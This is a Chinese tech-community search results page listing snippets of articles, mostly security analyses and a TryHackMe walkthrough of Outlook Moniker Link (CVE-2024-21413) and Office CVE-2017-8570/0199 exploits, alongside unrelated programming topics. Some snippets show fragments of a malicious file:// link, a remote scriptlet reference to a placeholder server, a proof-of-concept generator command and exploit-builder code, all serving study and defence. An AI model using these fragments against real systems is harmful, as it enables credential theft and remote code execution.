首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全技术点滴分享

    Tryhackme深度剖析:Moniker Link漏洞(CVE-2024-21413)的攻击机制与利用

    ,编号为 CVE-2024-21413 (Moniker Link)。 该漏洞绕过了Outlook在处理特定类型超链接(即Moniker Link)时的安全机制。 = 严重 (Critical)任务 2 — Moniker Link (CVE-2024–21413)通过在超链接中使用 file:// Moniker Link,我们可以指示Outlook尝试访问一个文件 作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。 远程代码执行(RCE)是可能的,因为Moniker Link在Windows上使用了组件对象模型(COM)。

    20110编辑于 2026-02-15
  • 来自专栏网络安全技术点滴分享

    深入解析Microsoft Outlook严重RCE漏洞:Moniker Link (CVE-2024-21413) 原理与利用

    该漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。 = 严重 (Critical)任务 2 — Moniker Link (CVE-2024–21413)通过在超链接中使用 file:// Moniker Link,我们可以指示Outlook尝试访问一个文件 此处的漏洞在于,我们可以修改超链接,在Moniker Link中包含 ! 特殊字符和一些文本,从而绕过Outlook的受保护的视图。 作为攻击者,我们可以提供这种性质的Moniker链接进行攻击。 远程代码执行(RCE)之所以可能,是因为Moniker Links使用了Windows上的组件对象模型(COM)。

    11510编辑于 2026-02-15
  • 深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

    ,分配的CVE编号为CVE-2024–21413(Moniker Link)。 该漏洞在处理一种称为“Moniker Link”的特殊超链接时,绕过了Outlook的安全机制。 = 严重任务 2 — Moniker Link (CVE-2024–21413)通过在超链接中使用file://类型的Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件 exploit">Click me

    作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。 回答以下问题:我们在超链接中使用哪种Moniker Link类型?= file://用于绕过Outlook“受保护的视图”的特殊字符是什么?= !

    13010编辑于 2026-02-11
  • 来自专栏FreeBuf

    乌龙的CVE-2017-8570样本及背后的狗血

    xml.rels文件, rId3是一个OLE对象,指向一个外部链接,注意这个字符串 ”script:http//[server]/test.sct” ,其中重要的是”script:”,这里标识了接下来要使用的Moniker (通过MkParseDisplayName()),也就是Script Moniker。 而Script Moniker正是微软4月份的补丁中禁用掉的两个Moniker之一: ? 2017年4月,修复CVE-2017-0199时禁用了htafile对象和script对象: ? Office,不能触发htafile版本的漏洞利用代码, 而script的漏洞利用代码是可以正常触发的,下面是我们在Win7 x86、Office 2013 Pro Plus的环境下,使用Script Moniker 目前看来这一套使用Script Moniker的漏洞利用比hta的exp适用范围更广,更具威胁性,可以确定将来一段时间内使用这一套漏洞利用的CVE-2017-0199恶意样本将会大量增加。

    1.4K50发布于 2018-02-28
  • 微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

    Moniker-Link微软威胁分析:CVE-2024–21413作者: #$ubh@nk@r阅读时间: 约3分钟发布日期: 2024年2月23日简介: 各位黑客朋友大家好! 此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。 攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。 然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。

    15510编辑于 2025-12-25
  • 来自专栏cnblogs

    directshow、 Emgucv入门

    找到摄像头设备 int hr = 0; IEnumMoniker classEnum = null; IMoniker[] moniker = new IMoniker[1]; object source devEnum); if (classEnum == null) throw new Exception("classEnum is null"); if (classEnum.Next(moniker.Length , moniker, IntPtr.Zero) == 0) { Guid iid = typeof(IBaseFilter).GUID; moniker[0].BindToObject( null, null, ref iid, out source); //moniker绑定以 ibasefilter和object上 } Marshal.ReleaseComObject(moniker

    1.9K90发布于 2018-01-17
  • 来自专栏鸿鹄实验室

    CVE-2017-8570分析

    国外的研究员公布了样本生成工具,备份 ppsx版本的exp 生成POC python packager_composite_moniker.py -s calc.sct -o example.rtf [ github.com/rxwx/CVE-2017-8570 http://blog.bitflow.studio/phishing/cve-2017-8570-a-k-a-the-composite-moniker-proof-of-concept

    61420发布于 2021-04-15
  • 来自专栏FreeBuf

    微软Outlook中#MonikerLink漏洞的风险和大局观

    事实上,根据深入分析显示,Outlook将该链接视为“Moniker Link”。Monikers是Windows上组件对象模型(COM)的关键概念之一。 “Moniker Link”字符串意味着调用者将使用该字符串“查找”COM对象。 从技术上讲,Outlook调用“ole32! MkParseDisplayName()”API来完成这项工作——解析Moniker Link字符串并使用它来“查找”COM对象。 在后台,Word基于字符串“\\10.10.111.111\test\test.rtf”打开并解析file moniker所指向的文件“rtf”。 因此,现在我们可以清楚地理解,攻击者使用“Moniker Link”攻击向量提供Word漏洞利用更方便,同时这也意味着对用户安全更不利。

    1.3K10编辑于 2024-02-26
  • 来自专栏Gcow安全团队

    CVE-2017-8570及利用样本分析

    0x01 漏洞概述: CVE-2017-8570实际上是一逻辑漏洞,该漏洞利用了OLE中Composite Moniker对象在组合File Moniker对象的过程中,未做安全性检查,以致可以直接运行 File Moniker对象指定的ScriptletFile(.sct)脚本文件。 self.get_object_header() + self.get_package_data() + self.OBJ_TAIL # Bypassing CVE-2017-0199 patch with Composite Moniker \"composite moniker\") using Packager.dll file drop method") parser.add_argument("-s", "--sct", help

    1.1K20发布于 2020-08-13
  • 来自专栏Y大宽

    linux之grep命令

    grep '[^kb]nike' words moniker moniker's monikers 可见,得到的是包含‘nike’,但前面的字符是除‘k’和‘b’之外的任意字符。

    6.7K50发布于 2019-05-15
  • 来自专栏中二病也要当白帽子

    CVE-2017-0199复现失败解决方案

    这几天复现CVE-2017-0199的RTF URL Moniker漏洞总是失败Orz。 最后发现可能是注册表默认禁用了ActiveX执行HTA。

    50440编辑于 2022-05-13
  • 来自专栏FreeBuf

    混淆漏洞CVE-2017-0213技术分析

    如果按文件名查找也失败的话,这时会按照Moniker 来查找。这时,我们只需将包含scriptlet的Moniker注入到一个Type Library 文件中。就可以执行这段scriptlet。

    2.2K100发布于 2018-02-27
  • 来自专栏角落的白板报

    《从零开始学ASP.NET CORE MVC》:ASP.NET Core Web 项目文件(四)

    为了指定目标框架,我们使用了一个名为Target Framework Moniker(TFM)的东西。 netcoreapp2.2是.NET Core 2.2的Moniker。当我们创建此应用程序时,我们从新建项目中下拉列表中选择了.NET Core 2.2作为目标框架。

    1.8K30发布于 2019-05-05
  • 来自专栏尚国

    深入剖析最新IE0day漏洞

    在RTF文档中混淆对象数据 在对对象数据进行了反混淆和十六进制解码后,我们可以看到这是个OLE对象,其包含一个URL Moniker CLSID。 URL Moniker被用来加载IE漏洞 使用CVE-2017-0199漏洞,Word尝试根据其属性,通过默认的文件处理程序,来执行文件;服务器响应中的Content-Type (内容类型)HTTP头是其中之一 像上面一样,使用一个URL名字对象来加载远程web页面是可能实现的,因为针对Moniker相关漏洞(CVE-2017-0199, CVE-2017-8570和CVE-2017-8759)的微软补丁,引入了一个激活过滤器 这是我们第一次见到利用URL Moniker加载IE漏洞,我们相信在不久的将来这一技术将会被恶意软件作者大量使用。

    1K20发布于 2018-09-11
  • 来自专栏王先森

    kubernetes集群交付安装spinnaker自动化部署

    /application: '"armory"' moniker.spinnaker.io/cluster: '"clouddriver"' labels: /application: '"armory"' moniker.spinnaker.io/cluster: '"front50"' labels: app: /application: '"armory"' moniker.spinnaker.io/cluster: '"orca"' labels: app: armory-orca /application: '"armory"' moniker.spinnaker.io/cluster: '"echo"' labels: app: armory-echo /application: '"armory"' moniker.spinnaker.io/cluster: '"igor"' labels: app: armory-igor

    3.7K10编辑于 2023-04-24
  • golang源码分析 :gopls(10)

    https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification#textDocument_moniker Moniker(context.Context, *MonikerParams) ([]Moniker, error) // See https://microsoft.github.io

    9410编辑于 2026-03-18
  • 来自专栏MasiMaro 的技术博文

    OLEDB 枚举数据源

    SOURCES_NAME DBTYPE_WSTR 128 枚举对象或数据源名称 SOURCES_PARSENAME DBTYPE_WSTR 128 可以传递给IParseDisplayName接口并得到一个moniker 对象的字符串(枚举对象或数据源的moniker) SOURCES_DESCRIPTION DBTYPE_WSTR 128 枚举对象或数据源的描述 SOURCES_TYPE DBTYPE_UI2 2(单位字节 名字对象(moniker)的创建方法,是一种标准的以名字解析方法创建一个COM对象及接口的方法。相比于直接使用CoCreateInstance来说是一种更加高级的方法。

    86610发布于 2018-08-31
  • 来自专栏VRPinea

    LCD Soundsystem乐队与谷歌VR合作,推出了VR舞会体验

    这种体验形式是由艺术家Jonathan Puckey、Moniker以及 Data Arts Team(谷歌内部一支专门探索艺术工作者与新兴技术之间对话的团队)合作创作的。

    77970发布于 2018-05-17
  • 来自专栏FreeBuf

    Office CVE-2017-8570远程代码执行漏洞复现

    其成因是Microsoft PowerPoint执行时会初始化Script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component

    1.8K50发布于 2018-02-28
  • golang源码分析 :gopls(12)

    https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification#textDocument_moniker Moniker(context.Context, *MonikerParams) ([]Moniker, error) // See https://microsoft.github.io

    9710编辑于 2026-03-18
领券